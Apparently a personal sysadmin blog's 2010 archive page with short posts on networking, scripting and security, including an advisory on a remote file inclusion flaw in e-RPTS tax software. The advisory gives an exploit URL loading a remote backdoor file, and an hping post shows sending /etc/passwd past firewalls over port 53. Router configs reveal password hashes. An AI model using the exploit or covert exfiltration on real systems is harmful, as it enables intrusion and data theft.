echo -e "INSERT INTO n_ips_rule (rule_id, rule, sid, name, category, description, live, alert, log, settings_id)" \
" VALUES ( $CUSTOMSID, \047$RULE\047, $SID , \047$NAME\047, \047$CATEGORY\047," \
" \047$DESCRIPTION\047, \047$LIVE\047, \047$ALERT\047, \047$LOGGING\047, \047" \
"$r\047);" >>newrules.sql
CUSTOMSID=$(($CUSTOMSID+1))
done
fi
done
fi
echo "Done generating SQL"
echo "Load SQL with psql -e -f newrules.sql uvm postgres"
e-RPTS RFI Vulnerability
2/12/2010 05:21:00 PM
About E-RPTS
(from the website)
An Open Source solution for Real Property Taxation in the Philippines
Part of the eLGU-eGOV set of packages developed by NCC for Local Government Units(LGU), e.g. municipalities. Other eLGU packages are eBPLS (Business Permits & Licensing) and eTOMS (Treasury Operations Management).
eRPTS web- and GIS-ready application that maintains a database of properties and owners for LGUs that is consistent with the Provincial & National government standards. It also generates reports that allows LGUs to improve their monitoring of compliance and revenue generation.
This is a critical vulnerability since the software is being implmented on each of Philippine government's Local Government Units and could expose sensitive data such as tax records and other business related details.
The vulnerability
in the file:
/includes/web/prepend.php
line 20: require($_PHPLIB["libdir"] . "common.inc");
line 21: require($_PHPLIB["libdir"] . "constants.php");
line 22: require($_PHPLIB["libdir"] . "setup.inc");
line 23: require($_PHPLIB["libdir"] . "session.inc");
line 24: require($_PHPLIB["libdir"] . "auth.inc");
line 25: require($_PHPLIB["libdir"] . "perm.inc");
line 26: require($_PHPLIB["libdir"] . "db_mysql.inc");
line 27: require($_PHPLIB["libdir"] . "tr_rpts.inc");
line 28: require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
line 29: require($_PHPLIB["libdir"] . "page.inc");
line 30: require($_PHPLIB["libdir"] . "template.inc");
This code is vulnerable to Remote File Include vulnerability by going to
http://victim.com/nccweb/index.php?_PHPLIB[libdir]=http://path.to.phpbackdoor.txt?
For this vulnerability to work, register_globals must be set to on and allow_URL_fopen set to on.
Recommendations
You should disable allow_url_fopen in the php.ini file:
allow_url_fopen = 'off'
The setting can also be disabled in apache's httpd.conf file:
php_flag allow_url_fopen off
This is actually an old PHPLIB vulnerability found here [1]. Unfortunately, developers of E-RPTS failed to update to the latest PHPLIB version.
__________________
Bug Discovered by:
John Homer Alvero
__________________
References:
Cisco Router Provider / Subscriber Configuration
2/06/2010 09:05:00 AM
Configuration sample for Cisco networking. One end is the provider and another end is a subscriber. The provider's end is using a Cisco 2651XM while the subscriber's end is using a Cisco 805 router.
First, configuration of the provider's side:
Current configuration : 3467 bytes ! version 12.2 service timestamps debug uptime service timestamps log uptime service password-encryption ! hostname CiscoHost ! ! enable secret 5 $1$JGXe$Y2vHtRP89namalZbyeMG./ enable password 7 104D010A0618 ! username root password 7 0449030F15400D1A5A ip subnet-zero ! ! no ip domain-lookup ip name-server 8.8.8.8 ip name-server 8.8.4.4 ! ! interface FastEthernet0/0 description connected to EthernetLAN ip address x.x.x.197 255.255.255.192 duplex auto speed auto ! interface Serial0/0 no ip address encapsulation frame-relay IETF frame-relay lmi-type ansi ! interface Serial0/0.200 point-to-point description Link to upstream provider bandwidth 2048 ip address x.x.x.2 255.255.255.252 frame-relay interface-dlci 200 IETF ! interface Serial0/0.201 point-to-point description frame-relay to Site1 ip address 10.1.10.9 255.255.255.252 frame-relay interface-dlci 201 IETF ! interface Serial0/0.205 point-to-point description frame-relay to Site2 ip address 10.1.10.25 255.255.255.252 frame-relay interface-dlci 205 IETF ! interface FastEthernet0/1 no ip address shutdown ! interface Serial0/1 no ip address description This interface is for another carrier's backhaul encapsulation frame-relay IETF frame-relay lmi-type ansi ! interface Serial0/1.25 point-to-point description frame-relay link to Site3 ip address 10.1.10.13 255.255.255.252 frame-relay interface-dlci 25 IETF ! interface Serial0/1.30 point-to-point description frame-relay link to Site4 ip address 10.1.10.33 255.255.255.252 frame-relay interface-dlci 30 IETF ! ip classless ip route 0.0.0.0 0.0.0.0 202.78.109.1 ip route x.x.x.224 255.255.255.248 10.1.10.6 ip route x.x.x.232 255.255.255.248 10.1.10.10 ip route x.x.x.240 255.255.255.248 10.1.10.14 ip route x.x.x.248 255.255.255.248 10.1.10.18 ip route x.x.x.0 255.255.255.248 10.1.10.22 ip route x.x.x.8 255.255.255.248 10.1.10.30 ip route x.x.x.16 255.255.255.248 10.1.10.26 ip route x.x.x.24 255.255.255.248 10.1.10.34 no ip http server ip pim bidir-enable ! ! line con 0 exec-timeout 0 0 password 7 1511021A0725 line aux 0 line vty 0 4 exec-timeout 0 0 password 7 02050D300809 login authentication local ! ! end
Now for the subcriber's configuration:
Using 1540 out of 32762 bytes ! version 11.2 no service password-encryption service udp-small-servers service tcp-small-servers ! hostname Site1 ! enable secret 5 $1$38vT$uCzNqai0a69mBYhyadqnS/ enable password secretpassword ! ! interface Ethernet0 ip address x.x.x.17 255.255.255.248 no ip route-cache no ip mroute-cache ! interface Serial0 no ip address encapsulation frame-relay IETF frame-relay lmi-type ansi ! interface Serial0.100 point-to-point description frame-relay link to Upstream provider ip address 10.1.10.10 255.255.255.252 frame-relay interface-dlci 200 IETF ! interface Serial1 shutdown ! no ip classless ip route 0.0.0.0 0.0.0.0 10.1.10.9 ! line con 0 exec-timeout 2 0 password secretpassword login line aux 0 password secretpassword login transport input all line vty 0 4 password secretpassword login ! end
Note that your frame-relay provider will be the one to assign the DLCI. Take note of the DLCI as this is an important key in the configuration. This guide should ONLY provide as guide. Make necessary changes based on your requirements.
FreeBSD PF Script
2/05/2010 08:50:00 AM
Sample pf script for FreeBSD. This is what i used and it worked for me. WMMV
#! /bin/sh /sbin/ipfw -f flush # Block an IP address from connecting to external hosts/servers /sbin/ipfw add deny tcp from 192.168.1.57 to any # Redirect port all http traffic to a local proxy server /sbin/ipfw add fwd [ip.address.of.proxy],3128 tcp from any to any 80 # IPNAT /sbin/ipfw add divert natd all from any to any via dc0 # Some traffic shapping ipfw add pipe 2 ip from any to 192.168.1.101 ipfw pipe 2 config bw 33Kbit/s ipfw add pipe 3 ip from any to 192.168.1.102 ipfw pipe 3 config bw 512Kbit/s /sbin/ipfw add pass all from any to any
WiFiCalc
2/03/2010 04:39:00 PM
WiFi Calc is a link budget calculator. It will enable you to determine the correct antenna gain, radio power and distance for a point-to-point wireless link.
Usage is straight forward. Just input the antenna gain, radio power in dB and distance in kms. and it will compute the signal for each end of the link.
The required signal on each end of the link depends on the receive sensitivity (for a required link speed) of the radio equipment you are using. This information can be found on your radio equipment's datasheet.
RFIScan - a Remote File Include Vulnerability Scanner
2/02/2010 02:52:00 PM
I wrote a perl script to find for RFI vulnerabilities in PHP scripts. It takes a folder name as paramater. The script will scan the specified folder and its sub-folders recursively.
usage: ./scan /var/www/html/
#!/usr/bin/perl
#
# PHP RFI Vulnerability Scanner
# John Homer H Alvero
# Feb. 1, 2010
my $file = '';
my @filelist = ();
my $txt_folder = $ARGV[0] . '/';
my $check_declarations = 1;
my $found = 0;
&check_folders($txt_folder);
if ($found) {
print "RFI Vulnerability Found!\n";
} else {
print "No vulnerability found\n";
}
# SUB(s)
sub check_folders {
my($dir) = @_;
local (*FOLDER);
my @fileVars = ();
my $lineVar;
my(@subfiles, $file, $specfile);
opendir(FOLDER, $dir) or die "cannot open $dir";
print "opening folder $dir \n";
@subfiles = readdir(FOLDER);
closedir(FOLDER);
foreach $file (@subfiles) {
$specfile = $dir . $file;
if (-f $specfile && $file =~ m/\S+\.php/) {
open FILE, "<", $specfile or die $!;
my $line_ctr = 0;
print "in file $specfile\n";
while (< FILE >) {
$line_ctr++;
if ($_ =~ m/^(\s|\t)*(include|include\_once|require|require\_once)\s*\(?\s*\$\w*\s*\)?/) {
my ($line1,$line2,$line3) = $_ =~ m/^(\s|\t)*(include|include\_once|require|require\_once)\s*\(?\s*(\$\w+)\s*\)?/;
if ($check_declarations) {
if (!(chomp($line2) !~ @fileVars)) {
print "Line No: $line_ctr $_";
$found = 1;
}
} else {
print "Line No: $line_ctr $_";
$found = 1;
}
}
if ($_ =~ m/^(\s*\$\S*\s*\=\s*)/i) {
my ($lineVar) = $_ =~ m/^(\s*\$\S*)/i;
push(@fileVars,$lineVar);
}
}
close(FILE);
@fileVars = ();
} elsif (-d $specfile) {
if ($specfile !~ m/\S+\.$/) {
&check_folders($specfile . "\/");
}
}#if
}#for
}#sub
bash looping
1/30/2010 09:52:00 AM
Basic Loop
#!/bin/bash for i in 1 2 3 4 5 do echo "Number $i" done
Output:
1 2 3 4 5
Using seq
#!/bin/bash for i in $(seq 1 2 20) do echo "Number $i" done
Output:
1 3 5 7 9 11 13 15 17 19
Using the C-style loop:
#!/bin/bash for (( c=1; c<=5; c++ )) do echo "Number $c" done
Simple isn't it?
If you want an infinite loop:
#!/bin/bash for (( ; ; )) do echo "infinite loops [ hit CTRL+C to stop]" done
If you are working with files:
#!/bin/bash
for file in /etc/*
do
echo $file
done
Those are just the basic. There are tons of tutorial online. I will leave the rest of the topics to you.
whowas.pl - a radius current user viewer
1/27/2010 01:44:00 PM
A
radius log file parser that displays radius users at a particular point
in time. It takes a detail file and a datime/time value as parameter
and displays usernames, framed-ip-address and nas-port as output.
Usage:
Make sure to set +x attribute to whowas.pl.
$ chmod +x whowas.pl
Software syntax:
$ whowas.pl <detail_file> <date_time>
e.g.
$ whowas.pl detail "2004-1-10 11:00:00"
The above line will display users currently logged in at "2004-1-10 11:00:00"
Code:
Usage:
Make sure to set +x attribute to whowas.pl.
$ chmod +x whowas.pl
Software syntax:
$ whowas.pl <detail_file> <date_time>
e.g.
$ whowas.pl detail "2004-1-10 11:00:00"
The above line will display users currently logged in at "2004-1-10 11:00:00"
Code:
#!/usr/bin/perl
# John Homer H Alvero
# Jan. 11, 2004
use HTTP::Date;
my $Line;
my @Record;
my $SearchTime = $ARGV[1]; #$ARGV[1];
my $SearchTimestamp = str2time($SearchTime);
sub ProcessRec {
my $Header;
my %AuthRec;
my $Fieldname;
my $Value;
my $Login;
my $Logout;
$Header = $Record[0];
for ($i = 1; $i <= $#Record; $i++) {
($Fieldname, $Value) = split("=",$Record[$i]);
$Fieldname =~ s/\t//g;
$Fieldname =~ s/ //g;
$Value =~ s/ //g;
$Value =~ s/\"//g;
chomp($Value);
$AuthRec{$Fieldname} = $Value;
}
$Login = scalar($AuthRec{"Timestamp"}) - scalar($AuthRec{"Acct-Session-Time"});
$Logout = scalar($AuthRec{"Timestamp"});
if ($AuthRec{"Acct-Status-Type"} =~ /Stop/) {
if (($SearchTimestamp >= $Login) && ($SearchTimestamp <= $Logout)) {
print $AuthRec{"User-Name"} . "\t\t" . $AuthRec{"Framed-IP-Address"} . "\t\t" . $AuthRec{"NAS-Port"} . "\n";
}
}
}
open(FILE1,$ARGV[0]);
while () {
$Line = $_;
if ($Line eq "\n") {
ProcessRec;
@Record = ();
end;
} else {
push @Record, $Line;
}
}
close(FILE1);
You can also download the file here.
Sending / Receiving a file using hping
1/25/2010 05:10:00 PM
This method will enable you to send / receive files even through
restrictive firewalls. You just have to be creative with the port and
protocol.
From the manpage:
hping2 - send (almost) any arbitrary TCP/IP packets to network hosts
Here we go.
On host sending the file, do this:
[host_a]# hping2 host_b --udp -p 53 -d 100 --sign signature --safe --file /etc/passwd
On the receiving host, do this:
[host_b]# hping2 host_a --listen signature --safe --icmp
Be creative with the signature parameter. The parameter
string is the key where the receiving side of the connection will start
receveing the file. Also, port 53 is usually open for DNS queries and
80 for web traffic.
Good luck.
Sending email direct to qmail-queue with DKIM
1/24/2010 05:07:00 PM
#!/usr/bin/perl
# John Homer H Alvero
# Oct 24, 2008
use Mail::QmailQueue;
use Mail::DomainKeys::Message;
use Mail::DomainKeys::Key::Private;
$FinalString = <<EOS;
From: user\@domain.com
MIME-Version: 1.0
Subject: Hello World
To: target\@gmail.com
Test Email! This mail should have valid domain keys.
EOS
open my $fh_message, '<', \ $FinalString;
my $mail = load Mail::DomainKeys::Message(File => $fh_message) or die "unable to load message";
my $priv = load Mail::DomainKeys::Key::Private(File => "/path/to/private/key/file") or die "unable to load key";
$mail->sign(Method => "nofws", Selector => "private", Private => $priv);
$signature = $mail->signature->as_string;
my $qmail = Mail::QmailQueue->new("/var/qmail/bin/qmail-queue");
$qmail->sender('[email protected]');
$qmail->recipient('[email protected]');
$qmail->data('DomainKey-Signature: ' . $signature .';' . "\r\n" . $FinalString);
$qmail->send;
close fh_message;
You can also view the script here.
asterisk cheat-sheet
1/23/2010 04:41:00 PM
Just a few asterisk commands:
| Command | Description |
|---|---|
| reload | soft-restarts Asterisk and updates internal configs with changes you’ve made to /etc/asterisk/* - does not hang up calls |
| sip no debug | Disable SIP debugging |
| show dialplan | shows the full dialplan of how your calls will be handled |
| sip show peers | shows all registered SIP clients |
| sip show channels | shows current “live” channels that are in use by SIP clients (off-hook) |
| sip show registry | this command will show you the status of any SIP connections with remote hosts. (eg: Your VOIP carrier.) If you have an authenticated connection with them, it will show as registered otherwise it will show it as unregistered. |
| sip show users | this command will show you a list of all the SIP Users setup in the sip.conf - along with their secret password. This is great for when you go to setup the phones. |
| database show | database Dump |
| sip debug ip | Enable SIP debugging on IP |
| sip debug peer | Enable SIP debugging on Peername |
| sip no debug | Disable SIP debugging |
| stop gracefully | shuts down Asterisk after all calls have hung up |
| stop now | shuts down Asterisk, hanging up any current calls |
Outlook 2007 + OpenLdap + CentOS 5.2
1/22/2010 03:30:00 PM
1. Install OpenLDAP
yum install openldap-servers.i386
2. Install LDAP clients
yum install openldap-clients.i386
3. Edit the file /etc/openldap/slapd.conf. Make necessary changes specially “dc=companyname,dc=com”
suffix “dc=companyname,dc=com”
rootdn “cn=manager,dc=companyname,dc=com”
rootpw {SSHA}wCaiPZjCvjCbQX7xp8j/95zBnl9XQQIj
Note: The rootpw parameter is the hash from the command slappasswd -s test
4. Copy the file /etc/openldap/DB_CONFIG.example to /var/lib/ldap as DB_CONFIG
cp /etc/openldap/DB_CONFIG.example /var/lib/ldap/DB_CONFIG
5. Restart the LDAP service
service ldap restart
Subscribe to:
Posts (Atom)